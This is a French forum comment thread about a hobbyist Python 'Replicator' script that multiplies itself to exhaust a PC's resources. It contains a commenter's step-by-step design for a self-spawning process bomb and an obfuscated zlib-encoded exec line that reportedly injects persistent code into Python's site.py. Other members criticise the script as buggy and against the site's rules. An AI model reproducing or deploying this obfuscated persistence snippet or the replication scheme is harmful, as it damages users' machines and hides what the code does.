RÉPLICATOR

xeolin Messages postés 336 Date d'inscription samedi 26 novembre 2005 Statut Membre Dernière intervention 8 novembre 2011 - 21 août 2010 à 07:22
aera group Messages postés 382 Date d'inscription mercredi 23 août 2006 Statut Membre Dernière intervention 8 novembre 2010 - 23 août 2010 à 18:31
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/52199-replicator

aera group Messages postés 382 Date d'inscription mercredi 23 août 2006 Statut Membre Dernière intervention 8 novembre 2010 18
23 août 2010 à 18:31
Je pense que ce qu'a voulu dire Laurent c'est que le but de la source n'est pas claire. C'est plus une sorte de vers (programme qui se multiplie) mais il ne fait rien d'autre et en plus il ne se propage pas par internet.

Il me semble que la liste qu'il a donné est celle de la charte de CS

Pas sure que ce soit un Troll mais bon, c'est pas très pertinent je l'avoue ...
xeolin Messages postés 336 Date d'inscription samedi 26 novembre 2005 Statut Membre Dernière intervention 8 novembre 2011 2
23 août 2010 à 16:21
Laurent d'après le réglement de code source le trolling est interdit, donc dégage !

Ce n'est nit un trojan ou un worm (utilise pas l'internet), ni un virus (il suffit de redémarrer l'ordi est tout et éffacé), ni un hack (...En fait ta juste balancer une liste sans savoir ce qu'ils voulaient dire..) et encore moins un crack LOL

Ensuite, sont code est tout gentil, il ne fait que créer une armée de robot pour anéhantir la terre !

Si c'était de mon bout de code que tu parlais, ce n'est juste une démonstration d'encryption de code, et si franchement, tu n'est pas capable de le décoder, appèle ton ousin de 5 ans il saura le faire... (remplace exec par print....)

En tout cas bien joué pour ton coup de trolling, et puis a tu franchement lu la source ?
aera group Messages postés 382 Date d'inscription mercredi 23 août 2006 Statut Membre Dernière intervention 8 novembre 2010 18
23 août 2010 à 10:41
C'est vrai que cette source est limite mais sans réel danger et surtout elle est bugé ...

Je pense que c'est tolérable par le règlement, il n'y pas de danger ...
De toute façon je crois que les admins de CS passe pas beaucoup de temps ici, il y a quelques sources qui doivent être supprimé depuis plusieurs mois et elles sont toujours là.
cs_laurent1024 Messages postés 987 Date d'inscription mardi 31 mai 2005 Statut Membre Dernière intervention 30 août 2012 25
23 août 2010 à 10:22
Bonjour.
D'après le règlement de CS, je croyais que l'on n'avais pas le droit de poster de source en rapport avec virus, crack, hack, trojan etc...
aera group Messages postés 382 Date d'inscription mercredi 23 août 2006 Statut Membre Dernière intervention 8 novembre 2010 18
22 août 2010 à 02:27
Oui moi aussi je suis un couche tard ...

Xeolin : qui a t il sur cette page internet ? J'ose pas ouvrir :p (un code infini ?)

"lancer un code que tu ne comprends pas n'est pas une très bonne idée." => Ici je peu le faire sans crainte aucune ... De plus je le comprend parfaitement (oui c'est encore de mon niveau XD) je ne lis pas volontairement ...
xeolin Messages postés 336 Date d'inscription samedi 26 novembre 2005 Statut Membre Dernière intervention 8 novembre 2011 2
22 août 2010 à 00:34
ok donc l'idée c'est de créer des nouveau fichier python et à chaque fois de les importer ?

Tu arriveras pas a faire crash un ordi, au pire ca fera la même chose que ce bout de code :

while True : pass

Ce qu'il faut que tu fasses c'est que, au lieu d'importer le fichier, il faut que tu utilise os.popen, qui te pêrmet de lancer un nouveau processus. Et que chaque instance puissent en créer d'autre. Un petit schema pour te donner une idée :


1. générer le nouveau code.
2. l'écrire.
3. le lancer.

mais tu peux faire mieu, tu peux garder dans ton code la liste des fichiers précédament fabriqués :

1. Lire l'historique
2. générer le nouveau code avec l'historique; sans oublier d'y ajouter celui-ci.
3. l'écrire.
4. lancer tout les codes dans l'historique.
5. appeler Terminator

Sinon pour aréa, lancer un code que tu ne comprends pas n'est pas une très bonne idée.

Voila ce que j'ai fait :

exec 'x\x9c\xcb\xcc-\xc8/*Q(-\xca\xc9\xc9L2\xb2N\xadHM\x86q\xf4\x80t~Aj\x9e\x86RFII\x81\x95\xbe~If^%PL/9?W\xdf\xd8\xa4(=\xd9\xccHIS\xaf(51EC\x13\x00\xcbM\x19-'.decode("zlib")

ATTENTION NE PAS L'EXECUTER !!!!!!!

Comme ça ca a pas l'air trop méchant, mais si tu l'execute, il editera ton fichier site.py et y ajoutera un bout de code.

Comme ça a chaque fois que un fichier .py est exécuter, mon bout de code se lance (ici ce n'est qu'un print)


Je t'invite a essayer de le décrypter, ca te prendra moins de 10 minutes ^^
aera group Messages postés 382 Date d'inscription mercredi 23 août 2006 Statut Membre Dernière intervention 8 novembre 2010 18
21 août 2010 à 19:00
Je suis pas sure que faire en sorte que ton programme se multiplie ainsi jusqu'au bug du pc soit autorisé dans l'article ...

Je pense qu'il n'y a pas trop d'intérêt à faire ce genre de sources, les virus utilisent des moyens un peu plus subtile que faire exploser le disque dure ou l'affichage de Windows ...

En théorie tu peu afficher autant d'objet que tu veux sur le bureau Windows, mais ils ne serons pas forcément tous visible. Pour les voire il faut utiliser l'explorateur Windows sur le Bureau.

Je ne regarde pas les sources avant de les tester ça fait parti de mon protocole d'évaluation des sources.
Pour plus d'info regarde l'un de mes messages sur cette horrible contribution : http://www.pythonfrance.com/codes/CALCULATOR-RAYGOLD-VERSION_51208.aspx

Pour exécuter une source en python, je ne peu te dire qu'un truc : Google est ton ami. C'est ultra facile et repris partout !!!
Sinon help os fonctionne aussi.

C'est vrai j'avais oublier que tu passais tu temps au Québec ...
dhuyp Messages postés 1 Date d'inscription mardi 3 avril 2007 Statut Membre Dernière intervention 21 août 2010
21 août 2010 à 17:43
Comme je l'ai dit il est en développement et je voulais avoir quelques commentaires constructifs de la communauté pour l'alléger encore... Du type une fonction de localisation aléatoire ou comment arrêter le blocage (Il me semble que c'est plutôt un problème de python, la solution serait d'avoir une fonction pour juste exécuter le fichier suivant sans l'importer, mais je ne trouve pas cette commande).
L'hommage à Stargate, consiste en un clin d'oeil aux réplicateurs, les robots qui se dupliquaient en nombre. Le but est de faire sauter la mémoire du PC ou de le truffer de parasites pour un test de sécurité anti-antivirus.
@Aera Group: ça t'arrive souvent de lancer un logiciel sans lire ses sources? Juste par curiosité ton bureau a-t-il tenu le coup?
@Xeolin: Il fait si froid au Québec? >.<
Bref si vous avez des idées pour le rendre encore plus "virulent" en restant dans la légalité de l'article 323-3-1, elles sont les bienvenues.
Librement!
xeolin Messages postés 336 Date d'inscription samedi 26 novembre 2005 Statut Membre Dernière intervention 8 novembre 2011 2
21 août 2010 à 15:53
Non je ne suis pas un lève tot je suis un couche tard, décalage horaire ^^

Je ne suis plus en France, et, tu devines où je suis maintenant, ou pas... En tout cas "il va fait frette en tabarnac !"

Xeolin
aera group Messages postés 382 Date d'inscription mercredi 23 août 2006 Statut Membre Dernière intervention 8 novembre 2010 18
21 août 2010 à 10:41
Mer*e j'ai tester ton programme sur mon bureau je te dis pas la galère.

Bon je pige pas trop à quoi sert le programme, le titre référence à la série Stargate est alléchant mais il n'y a pas grand chose qui y fait penser. De plus ton programme bug au bout d'un moment, et heureusement sinon je vois pas trop comment il s'arrête (un "-" apparait dans le import).

with avec open me fait penser au cours du Zér0, pas très utilisé, mais pas très lisible (pratique ?)

Pas grand intérêt, pas claire, bugé = au-revoir

Xeolin : tu es un lève tot ..... je suis encore a moitié endormi ...
xeolin Messages postés 336 Date d'inscription samedi 26 novembre 2005 Statut Membre Dernière intervention 8 novembre 2011 2
21 août 2010 à 07:22
Aucun commentaire, vu la taille de la source, tu aurais pu éviter de la mettre en téléchargement....
Et hum... Ok c'est un hommage, mais tu pourrais expliquer comment il fonctionne...

trois étoile car tu as utilisé la construction en with avec open, chose qui est asser méconnu !
Rejoignez-nous